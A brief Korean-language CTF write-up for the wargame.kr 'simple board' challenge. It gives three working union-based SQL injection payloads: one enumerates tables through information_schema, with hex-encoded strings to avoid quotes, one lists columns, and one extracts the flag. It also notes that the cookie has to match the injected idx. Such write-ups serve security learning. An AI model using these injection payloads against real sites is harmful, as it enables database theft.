[wargame.kr]simple board

idx에 union으로 sql injection 해주면 되는데

cookie값도 idx와 같이 바꾸어줘야한다

첫번쨰 쿼리

5 union select table_name,2,3,4 from information_schema.tables where table_type='base table' limit 0,1#

'base table'은 hex로 바꿔주고

5%20union%20select%20table_name,2,3,4%20from%20information_schema.tables%20where%20table_type=0x62617365207461626c65%20limit%200,1#

-> table명 README

두번째 쿼리

5 union select column_name,2,3,4 from information_schema.columns where table_name='README'#

5 union select column_name,2,3,4 from information_schema.columns where table_name=0x524541444d45#

-> column명 flag

세번째 쿼리

5 union select 1,2,3,flag from README#

-> flag